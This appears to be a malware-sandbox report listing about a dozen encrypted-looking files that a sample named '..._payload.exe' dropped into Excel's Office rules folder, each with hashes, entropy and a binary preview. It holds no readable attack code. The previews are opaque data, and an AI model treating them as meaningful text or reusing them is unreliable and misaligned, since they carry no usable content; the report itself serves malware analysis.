                                                                                                                                                                      Preview:<?xmlR..G4.......W.a...P....Z.].Br"...DF.....j...h....j.S.[..&.Z.......m...../...(.d@.....N.TLi5H...U....!.M..b.u.!V.......=.<Fjax?....Td9..0.cE.@. .D.......H......V6....W.-PM..h....`..T..S^...!a..E_=..{.<O0c.GI.)......P..)<.2..6..cc+......"{r?..m.1...=V.~.%U.M...../.:C.......Z......scZc..`.F.O.y&]LZS..Z.........2.4..S..SH..{bm.....)..W.._..C.\-.U...3...*DM~.Q........cQ.?k.<n..YEKc..y......0./x.'..~SL.xBy..)zjh.....Y./04......W.@<........h..7.t.<..J...u.%..g.~....i.....t..~.Z.;..W.z1vx..x..O.(qd0{.{;d.o,|2.../.}r.Rv......+.t...T...F...~.m...-_^'W[.j..%"..].G..\.6.........P]..z.W)....m.V.T.....6...i...2]P....`..O.q^.GJ..)g...oq.F.d36%.W...Wa".\...]Y y`#.v.Y...R*F*.b].V.G. X...g....y..b...G..a.+...Ex.m.{OO..].g.I.._..s..c..#4......r .iw*..$.>$.e.om2....[..wN.g.N..0].j.+.\A.B.&s.J,...9.:...K..LRj.(....z..Q*.U.hXj...J.....,.t.r.......Y%.=9..|.......;...........yH..{t...R,...ii.U..t...%.z.U)U.[.B.")....."...$...}..kvW.&$.:.......~$3.A.....c...:./.0q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63066v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1121
                                                                                                                                                                      Entropy (8bit):7.8135842518692025
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3wQI+6hpTe3IA0xttaRlatXibjmOK5lelrB0Bg2bD:3wQahpsoPtQatSbjm20xD
                                                                                                                                                                      MD5:BB1C12285777296326CBEBFEE7576ABD
                                                                                                                                                                      SHA1:614F386214721A91AB0B93C083FB6C8774759081
                                                                                                                                                                      SHA-256:FD240D0AB46FB73AB3FFBC9182063DCFE96E23AFB3FE5D3C7D83DFC7193A62D3
                                                                                                                                                                      SHA-512:F7756ACB617BFA7AF06C38DE4313273C583D091E10402EED1C2F5715E7391EDCEDEB0B3D6C28697AF680FB6199F285EBBFC53E9547F4C12142B1E8F9CB4BEDAA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..{.s..6Qq2mm........p..mg....W..}.)....+p0.D...@}...w.b.{`..K.....)........._..h....YT.i.G.u.:.0....mu....A.J./V...f...%C..0...uB(..x.W.p ......r:/.<4w.^.......x.....6Asr]P].e.7...zJK._.=.......g.].t..%.p.[..........(R.-0..>".5.4..@3.EB_ru.T2.T...I...3;..>...Fu.\.z.#\..g]/..u.......C..c|....l....+.ti...>7.H....f......:...#...O.L_.B...S.x.b..x..6..L.".k....!...Q.N5c.....".H1.._$.....}...&....bUMNJ..m..Vz!.......C...n....._..p,...t6.K.<..Ft..}....aE.].IJ..-....g.&0c....!l.^.e...OA.Mr.u.(........P2..y[.6J..Ls.N5...F/..7..6*D.J..+...T....W..pK...v*.i.g.Zp=..D.=:HK...W...20#@zgNa.D..;M.^.&.i.q..+.....:N...r.........yy....w[[6'%l..H..x...m.....p..Np@....Q.....wJ.c\9[~.>>.%.R.............u.5...S.6`.{J..=.>..Ve..yuH...`..GFeH...z..[.?pl.../...*..].....g..q...YL..x+9,.m......%(.3..i.<;.~.......]/D`....@...r.......r..5=..&r..ER.Z.,.P.o-.n..QV...........M.+.)C@.l..k.G..2..(U......5{............*nB..Lb....@...~N"d[t..{..m.ex....H.".....i.8..l"$

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63067v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3109
                                                                                                                                                                      Entropy (8bit):7.934257337308223
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:O7/RgyvemH04Z/wTNrTN0VZvaWoJxd8TISeyjG2OFNd58MjQ5idn0bwNhD:0/u2eGN/wxkvaWYtiROFLuTSVNJ
                                                                                                                                                                      MD5:2CEB49AF5EBA4CF9EE2AD6DCCE6C001F
                                                                                                                                                                      SHA1:33240BA966586658597716E648C41BCAD0369590
                                                                                                                                                                      SHA-256:D2F257F1FB12F4D5335CE2E05C65FA846D4CA561695444FEEE174FA8D4540173
                                                                                                                                                                      SHA-512:07DA27140D2C1F66E2E9B95AFA13A29383BCA15022738C39FEC552000C2384F229A9D7B7D221444174A7C0BF8767684DB953E515BAC7713A36985BEB64AB359E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....{...m....*...^......*...A..U\...i5.,....ro.s..h.F...].........x.1.-$.H..&...B..9....^...^..........R.........l`IL...w.....xS..+w..I..w..S.m.!.....m...'.....&......I.......K4{...1L..M3.Rz....$.W...D8.R...J."...6..p..&.^.."..S.e.......2.Mb~..@.W..5_6U....z..h.-..)/O....Y.r.-Y.E..AC.{ckk....tW@......X..L..M..i..H|%..j[....x.....P.K...0.I...~.`...z.Gi.2......l;"../+x.8...ZMZ..4..x....RW.V...8..m.#.9T.........^.m.y}....R.x?Q+.'....8..{..%...93.T....r.."'...z..<2.$p.._.....]...~....p.$=+}.J.y.i./.|.sT.D............2..GL:..VYwL....%.8Exv.r.8'R......M$8...q..FN%..{..U#.8.w.V..faL...Y.Y_3B.[h.Z}...^v.T..d..J.w..c.+.W[l..r.wf.k..$...+O....?.a95Z.m.vI.X?t%.U(..9<.......*..@....Na.VC._.....F..S$...A.~Z.:..9..0.H.....A..w...Ba.-66u...e.....Z.h......y.....sh)9&7 .So.|].`.lO.vP.T.......\.7......`...)fO`..>.8)Il.]....!.......j..#7...?..4..|.o.......w6e...0\.....P}..2.(..AO...;.-........{.......x.?......q.D8....B.............y..s.('....... ..;.4[..&....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63069v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2126
                                                                                                                                                                      Entropy (8bit):7.912701540887904
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:g9w5t4IeV2dMzBD3S1mHa4hpnFb41qmYyr7tht7COk0wfnEYhUKIHhLISD:cE4N2uzBD4Ia4nx41DYG7t20wMiQ7
                                                                                                                                                                      MD5:90BED3F763954ED0634E921A5BE93194
                                                                                                                                                                      SHA1:CE67C8DE8B2A18BD570DB5060F3750B72020435A
                                                                                                                                                                      SHA-256:BD528BF2FD1838586605682778D0EB0583037807E395DB48A2F6E1C6058F0DB4
                                                                                                                                                                      SHA-512:E12B7A8D9B1CB9DD210D7DE2257E96B65C816172C58719568EBBC1C8FD876A846182CF3FFF742899EEF752039F5C77B71259AF10F043404A5B40D8E6BA1DD885
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..L.}>......;.....P.^~'...6..Q./....)......P.}..Q..A.U9h_!....DR..'\.A..LvF .c..gAh+sM.+......R.........m!..f....a.&.;..\.sd.\'.........<.2<._.....*.x4P-N...Z...R.p..d9..{\.p.jI..r....*d[....S_..W..27..........F3...0s..E%.*.d;.A.......qb.x....g.$..........Atg..../.l.)....\..q..$.Fc.-............H....D.{....e_..;.!.x.'..r.,....fO.z....uQ.F...&.........u~J...........+;.y...Rl8.5.N..Y@.&j.'...E../|.#.'8.=..l.;).....!.H.....3..[`mu.X.:4TD.b..f.y.k.r3.G.s...?..T0&t.R....:Y.}."c.<8d..2.......Cn0u...O.K..G.........{M9..`...f..H..,.....V..|........5#.=F....FfU.,G;i*A....Vd.=yna....D..p..N...N..wS......;..*..\.....GUe.]...-.C.c~....D!.7nx....=b.HS.s...m...)....4..Jz....s...Z..e.g.w....f.;~...($.....+.....?d........{....l..DT7_..Z...n..>..L...N%..".a...50../....-(.=ov.......T=.|..c....9.GA...4.\../...\..H...E<g..)*..Co../o..........M..I..ak..[|..7.wJ.....|"..f..b........5..s.g/ya......U`.Xo..~.=...U.\....O....b..saK.k...]..8...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63070v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1387
                                                                                                                                                                      Entropy (8bit):7.875843095121651
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GjN/gy/cPdzULgQgHzAI4Th/IDLdqL7QMlyTN/bpmV34QL3cU+yLjZ2VL2bD:GpB/cPSLgQgHsTh/I9qL8MoJ943L3cUt
                                                                                                                                                                      MD5:1061FD556F91E55EB095C27B7B7488D4
                                                                                                                                                                      SHA1:77D5A0C9D60CE5AE06BCBA886B32FEE6C8B31E8E
                                                                                                                                                                      SHA-256:D2DC2A319F3E5825303C610B237C24BE0903C9B4A03A35613D7AF891F72C56BC
                                                                                                                                                                      SHA-512:7C5B02128B1838DD3868D898C8E597E3E6A0B723FDF97BA63EC52D376CD0FD14BD3AD6E4855CC58509D60891B152B5E1D9646237E3AFFFE4868C3F93866D3DA5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.c]..3...m...vW..f...C......q.Q..5.....O............g".h.W.J..LQ..{.........~..Q.&.G..|. .2CEl.qyQ.............d.5..o...tk...Cv..M.....}..T...4.K3L..+..YU....;WW@Q...baO_...nC..e...is_z....Zu........p.:....R..t.0....V.h.. .j....P.wWLWT\.v..$)+'..o.u.7.tz...yj...Z.UO.m>K.P....4/.."(.....h.....f..<..a{.....c.r.T.....N..{.4..a?.t'....%!.o.l0..|..........PJ..C.....4...\....v..{.m{.+......TS...Bog.u....b>Oy..4#N.....*.#w........6.#-..?o...x......z4Z...5..H.....P.].L..|.@..Xi.+=|.7_PW...d.6..xk...T.s...^..T...'.f.)b.J-......._%.Cw.v........b...C.....sG...B..rn.Z.r..1...j{.......&..@......#...Ih..#..."?....0..0...9..*.H.mi.c..........gx....$l..x0../.J.O.......1K...._.....O>P....o^...2..>.....D.....W.Y&.5.:y...^...`a.h.!..L ?....m#...z*...r-O......\....b5..]...<.zj.....)Hv/.L.8..Mq+. ./.e..'.e~./..N.1G..Q..J.....:...}7..6......6..k..-.fz..... .....|8.&.........k.4F...........)bR...jH.&.d..T.v;..[.=...3...Qu..g.....Y....e,3.f(.G.V./.}.1.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63071v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):754
                                                                                                                                                                      Entropy (8bit):7.739357401282703
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QovDYL+0am1LFKGkXuJxXzDgjdHcsh+W9WLHDtdu94BuYwHvyFotjWSUdNcii9a:5URlnkXcz+t5tUhdkjHvRx2bD
                                                                                                                                                                      MD5:0634C76AAC25DBECD1D3A2DD6B9CE8CF
                                                                                                                                                                      SHA1:EC2DBB4904736E5BC30389555ECE84D3765F09D3
                                                                                                                                                                      SHA-256:C99D8B12F0865C790AD8D6DEB8F6C1B965D6A29896AE538459324B00C5DBB53F
                                                                                                                                                                      SHA-512:63C22427AD8DD466F1119B9AFE349B7CAC5B3B775E2BDA887D31349E0E28A2EC03CEB25655AAB0B5AC68EC78920209AE1E38E1C760E717D962058F9FF38007E8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.t.....>`.Q..;r^..+..Z...+?|.W..c.c.."ac...n.r ...O._.A.!*K....WJ.. >p.#M(.3s.<....e{.F.......h.......v.h:/.AR.d..._.|c.\)h.. ...#.3..b....aC.....mA...1.#Z.BE..cb:..Z....2.....W...+..HI(..L?..m...Q.6.Z..f...@O...{.x..t..)..7./.u.B..D..R{.l....K..._y....*p..4.F.N.6.......I......F+S.....7.}./M<.+..<..i].8.N+.z.v..a....).....v..[!....S....g.......[Dnd..f...gh%.={s?...<&....:...."....;..^[.......-......Q;...h#".\.......z....l=.B3=.3:..V..p"&.?'.....8..Z....>.E^.D.._.....".-....!j.{.\.........__70.+.3:.X......)....q..[....<pn=5.....N@.....".....4..A.W.4b[..n.rDB@&.....U..>..o....;...g...i.".`.....u.azZ.3>..9.........i..z..tDf\...g.KR|mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63077v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1399
                                                                                                                                                                      Entropy (8bit):7.849226570975124
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ULXWkTwvq9nSciLWQ2x4Momf9LkCzbvaHZisNx5otzRpRYBU2bD:Ury6Scxomf9wYbC5/osVD
                                                                                                                                                                      MD5:A1C924CA52FDB2892DB0079A2FFC563B
                                                                                                                                                                      SHA1:D4D7921A13EE663A975887217440DA0C76524C01
                                                                                                                                                                      SHA-256:C04C172633E9C0D2F5FB26F2E49EE3653E21983247B38A40A9D6CDB55D14A0D0
                                                                                                                                                                      SHA-512:30B610346E37FD87C4884CEB9A3F8DA8B1B9F54D02F5246367AF07AA74CBC9D0A80A6362E6C4A7229920FE51632954DAA02609FC06374641A3DF40ADCA4A0C6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...I#.....d..X$..a...j ...o.0`.a..S}z.+AA..}.gb.kwLw.?8.=.r...}.n......f.*.q.7..U...A.....)w.]K..*Lu.*.......T...L...*.....S..a\.5.~{..v.......o..56_?!.`c.^.9G...g.9#..aC.g'}...d...!..u.../.......mrV.8$..3>y.#....e..]~....j.x'..4Wb3.Q.!..y...x4.._.F.. bP]A...u.@Di......v.l^.....z.....@.p.;e....j.4S..........m]..M..".....P.}..z..*..".....dVk.^k.bQ........r.y.....I;....L..m..&.$/.9.;.T...X......s$..E>.2..H..G.OsT.`K.+;&......_Y.......?....uP.R.j.i...m.x.......^....8|.MZ....4.G$6..V...0...N)..k.}$Kgh.. m..9.F.h.F....2....D...ApR0N..mW^.gOM9.X.s2.]$.oK.6.|..EU.#:u.._j&dDp..#..KS....x.zH.b...{)...=7"...x..'.7......4.......S......4.....mX.Z^...=.W5*.*w_Q.Q.a...dUX.G...iX.d%{...<....[.H.A..a.....=..:(.#$.-.T....=......o/\E......2....c.....t..7...`{.o...@v.... ...>3<.C......3..l...B.........q......LD.S\.+9n......5....p.x....D.DK...."..qF.z..."......R L..U.d.1.E.k.M......5..%..f....$"j.mJ.....P^~D...;...,.....4ZC..-h[.0r.M.<.....Z=j..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63078v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):708
                                                                                                                                                                      Entropy (8bit):7.574945667624964
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DRs8Vbw3DFDHQwhkOc3NGnTenEhixXGMJEl5WrTFuIcuOJYUPus3dTefSUdNciik:1s8Vbw3DZDh9sNGSnEhuGMC7CTFuwhs4
                                                                                                                                                                      MD5:58CEE2DC4E4D9053DEF8FF3E804D3B07
                                                                                                                                                                      SHA1:637E9F5815C64A65207E5B04FF6808A4B2011726
                                                                                                                                                                      SHA-256:494DC59A56D1F04DC05F1560A3B9E56F7B7684B6C779CD6BB6F431C999917F78
                                                                                                                                                                      SHA-512:1E45B198A384826C7933199AA728B297AFD79E6E00CB70919D350CC305F9DC242923DB4C5CC9E321AD934A170E90E2E77EB22EDE324A0DB751238BECD8E48AD5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.a.;D.r.1....A-.)z.._9.t.\l_m5Dn.f..d3.p>(Ti...$.m.1F...s.d.?....;>..f-..A+...q..F..,.*....j.A..Q ...{..+4....>....e.3...9....3!..sJ'.h.{b.F9...kJF.}_..%). .6....T.{.y.......%..{hr.!....*....[..2..<.Z.?..bBN9|..^.T'-y..:....@...P.B....=.O.c.....M.B.;G..T......n.I.`...m.@..5.Z..U..[.'6(...@n.5M...Ev..A...^.-9lf3!.Ay.....?{.|B..x...?5 .;hP.$}.4>...Yd...Y.;..k.|..q...d\4<..$...>..3..p.h.H.....+I..O2..}..U;...r+Y..w..Qx..0. ..[..3.J%0H..(Z..h.W..)3.z..czhr#.)X...U.y...wB..O|w7xt......f?.9...7Z...-......n.v....~.n..?./!.|_......,(..G...d..3...&..K...+.....6IJFXqS..W....!.HY.w4."...h.. .....r..k.p:..^.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65136v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1132
                                                                                                                                                                      Entropy (8bit):7.833183442821913
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UBngUJ2p9V4hj2cX6UlIbjk3qjNSyg7YTAVFOghQdQNPZIM2bD:LUJ2pr4RXgKSSyg7YTBg8QNPZIfD
                                                                                                                                                                      MD5:F3D06DC39195B15C6AFF5CF0D61E506D
                                                                                                                                                                      SHA1:7AB946897F350F9D1AE78DAC96EDB720BB9BC710
                                                                                                                                                                      SHA-256:1ED3FA20FECD4205ACE33A3E82E032360ABC07BB9B0195F6F0967EEE3D36998A
                                                                                                                                                                      SHA-512:6ABB7E82D2F4E264EAE51224CD11D79801CCCB00B8C71876BF5CEC82319B28A38EA5A60DE97DD0652548A283EA94152BE4B2D60417CD05399A552A53AB8D5BA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml<.(..6PZ +..]..pp.v.:F...9....2D.."..o&.."...B...Q....d..n..5.;.....pT.8_..s\O..4~......~g....32!'.y,......K..'.....z4...Rp...p/G\.c....-:....yr..0....~0Z.iN.S..J.}.....]cN..D....K.P"p7..)sM...X}sNxm...X..:... ...u3>6...E.Y.....z........@...Ok.x...Uc.h..!$.3..HS.,.8..0..R....J..............p"..O.{T...c.j.?...`B..".%...`... .S.5./.B..J6..{...^..(/..........T9..f.....<..0......Gm-L...1...)m..b.@!(K+.8..M..4....!.W..........P..J.......y.=?.IW..9..(Gh.[b../v.;o...yT.V..W.`.2,`j<{4...oYO(.<..[.0.$...'*7'sF.=7..m{....Q(.8.h.E.d7%Y..fdH8...e.3..+i:.l9.+....'.......a..]......x.s5..A0S.u..+z.A<Dm..z..3.d#.E.....g.V............;. hEk....+.:<]F+5....7..%Qn.\0l..U..[.a~ .u....5...). ...o...........w.];..A>..w.J*.]t.g...B...8..J......D.......D.....4-x7.2.a.......F..S-..^9HI...i..'...K_{.`).."......N.......-.W..U.=>....jv[..E.b....!....;.i.a..7.j.s."..?2.r.5.I.M. Z..:F....L.b..WR..Q.;W.=...EC.KQr>.#.b. ..T`\..(...>.x...+..E.Um ...g...H.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65137v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.696118896830851
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:hw2g2EbQ8dVQgQ12CVSQJVPNRdlwZuTuXDl4pMVbpfnO99UO1SQWSUdNcii9a:mXlFugQ1zLVPNpwBDipMfnOIOzV2bD
                                                                                                                                                                      MD5:CE6BA71D143AEB18928D4445CC99BDA7
                                                                                                                                                                      SHA1:4FECC8C0C8DDA6DD0E7CA17912B7D278D98F4433
                                                                                                                                                                      SHA-256:82ACF25E595B9B3CE6C354D0E4E5A9C7CD7F759771BECED8F0AAF82A3F8880CF
                                                                                                                                                                      SHA-512:7A6380D66CEE9F59473D208C8230A10A49067AC905F5B711493E0C930CF324EDC765ACF8808294D9176C1380E987263699E16070DDEEB3691B1A9CEA1F9B9FD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...TG.@L..=i..FA._.s..3`..W>#9..3.Di..C.......y......H'..6..8.S.4..._..k.%Q.J..*..x..!..2.Bp...&+s:...?n4d.]...rI+.!....!.V7.!U..........Us:..4..-..2...KG.}..e......].....8VC.H.l..BX.....dV#..R..F.OC.X_.y.p\!..........i1....q.q......\ckmM...9{9..l.KB.#..m...........5..]..B.........d.J%W...........{.Y..w&.Y..}.:..6.v..D%x.....\..5......49...Y Y.Xbm..?.......~.7..~\......_0.4.....m.....Q>........s| uuf...c;^L.H......C1Y....4..)d.qr..T.d.p..{]./.``C..'...R.aFvc..6x....(g=NK..&.qu|..,..f..#).[.8&c..F.6...L.W..._,7q.(..M.$.)..S.....(GM..!.BUH7.S.f.n:vq...s.f\.....=....g....Nh.....N-N..p.c.....`0.x.N.^.3.f.<.....X<....T....U..{>B.G.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65138v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1094
                                                                                                                                                                      Entropy (8bit):7.801770277931879
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7HHZdJGUvsIVauyasGRZ6/IHJCGBp0O2bD:7fJZauyCRg/qJCkwD
                                                                                                                                                                      MD5:AF99C25012D5838B4B1862A7741C887D
                                                                                                                                                                      SHA1:482D824471F6A21A00CD7145A1CA70418732750D
                                                                                                                                                                      SHA-256:7AD7134CDD1E8D84080B693EAEBC32A1A3F90EDA614368FB2815BF4B6052EC6A
                                                                                                                                                                      SHA-512:EE62174DC477B9E706B93D1BA46D75815E650C34C9060C21A9522F35C80D202CED22D370F67ADF7859C51B70F41D391640ACDA8ACC908E6328778D1A59009E52
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlQH.wM.[..k%.0.Y3..0....."#m...n....+.4.)...zK3.P.~6.+...2[IKQ.[m.1..P..0".@..4!.Y..M.......x..m.<.G.....p..\..p8F....)..h.F.v...f4.....9p=V.T....\.`.......p...N.P8........=. `.......`BoU....w...o..X......P..]N....G.....>U......#.%....K.......V~.....a..o.5...O.=.Y..g.vw......(]!.......D..3v._:;R.7m.}.\.^.K.q...h..%.`..T........O..v.....t:....]..(2..,....a.ln.....w..lt..%h..W...d.R:. ...w....q<M?.dO[......m.......u2vZ*.@..G13mK....hT...@..?..|....fo33.=..,^.c.ax.i..>...Z.fC....t...L..;.6........v.O.J...g.4(...........2A.....n.0.+.f...Z........K_S....._......a.Qtylm....R.H.$#...CS.^..p4..Dh..l........V....(....[.&.........O.=..I..G.<...,[#.1QY.J.'r..M4m[.3...<.`0li.z..l.......y..z.=%..YSK.AX.......".......X..5........4=...o.......IC.o"q....@.Q.w.E......#.iq.@.D..c.{..j~.l....H....].k.)j.......<....I....CL........l.+&...K..;..u.Z_.E.c2.....+..nH{.[B."j..0....Kb..$..2..5....n...79IRv.[{v.....}]..L........RM,....-..Y."$..b>.M./1.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65139v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8095
                                                                                                                                                                      Entropy (8bit):7.97786699783464
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:LJVlILks8EvbKnIsBn+I72mfOuEDuxgNzEe/Gxv+BIo:LrG7vbKIsB+0fOl4xe/2GBIo
                                                                                                                                                                      MD5:3DAF2AD4D5C0E7D235979AB64487158C
                                                                                                                                                                      SHA1:872D2BCE18369D9F9641B2FF8C845718E81BF12E
                                                                                                                                                                      SHA-256:EC635AE9BA35A9ABE7D03667BD1331BB1CAF3B43B733BF236394E95E62D89DB6
                                                                                                                                                                      SHA-512:A129BED5206954A75D78551F3D663EFEDFC657495E3D238FECB290FEBDCBCAED6C0187BC7077A9B3038D2FC01A8D41C7B86EB6774901B690A1EF7EB8D0358C2F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlY.X7....!_.i..A.v...@..\{.o(c+...Z.....N....|...S....`..?.m...jy.e!...p.I&6...J.l.....k.*...6k.g&y.:.o.P..AvZ....>W..s.....h.,`tn.N...w.b....B.R...P.aOH...*pW,..<..e.4I.b..<.YlLb..Z.:5+&V...X...$.........9.._^M............5..$B}..y...|..4.i@..G...f...\.0.@...A...,R..0p..7..h3...D.L..S.5...J6......)........^X.p.9...[.}.U.+..Z.....7B.]...-.{8..l8..7.....76}.v..Q{...f..G...7k.t.K.OLb..q....m.....>...C.R.:zu...ow$'d.O.K..y.g..b.-..`.....)......>..P.....1-.*<....7.6l.;...4.r... ...;......q...&.bn9...Z.cVV.yc. )./..c.).m.O........J.....r...;.5..*Aa.t..%|.iDJ.Z).~.&.O_@.>.#.......7c..6!...:F..IW%.....(..A...0..].|....,.\......*+.a...;.c.....J.zM4...B....i_.P...S..AVf.'q........mL..H.(..!*B......_UgzjS.:......@....O.....P..`.|.}.e.QoR....'...\.{M].?.c. .Nu..yP#G..Y.Z..I.J8...C5Ft..&.w......f...A....(.F...7.Q.Mqs..]{..=..-.Pm..".(.b.'....6..5.y.._.W.=.D.0d~n).{DD..v....c..Z.x..ppRD...............~1..x.......D.o.FL\.0..tw..).....@~.V&..tP.a.4...6

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68000v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1047
                                                                                                                                                                      Entropy (8bit):7.824499428878389
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:M6s4NHn/TI8zYcKzjG0vyPecddxVrgP3pYY/uhZG82bD:tNHbIiYcKzjG1eg7EBni2D
                                                                                                                                                                      MD5:A2B7103895A5B28A28C81C7464AC0B12
                                                                                                                                                                      SHA1:BEA61708459502AC098E6897828E216E4ACD96EC
                                                                                                                                                                      SHA-256:D04CD3F36E467777F9529B3D8483FF4AD7F155255402966A11A62CA5245A7C56
                                                                                                                                                                      SHA-512:32D9AFA3D68323A5CA42ABB5752CD6AEFB1B59B6DF917F91BDCEE819A0B8439EF6B74DE2B2BAF5C086AD2DF43909CA08C7E538DEF2E2F0A52B2CC609A7943D7F
                                                                                                                                                                      Malicious:false
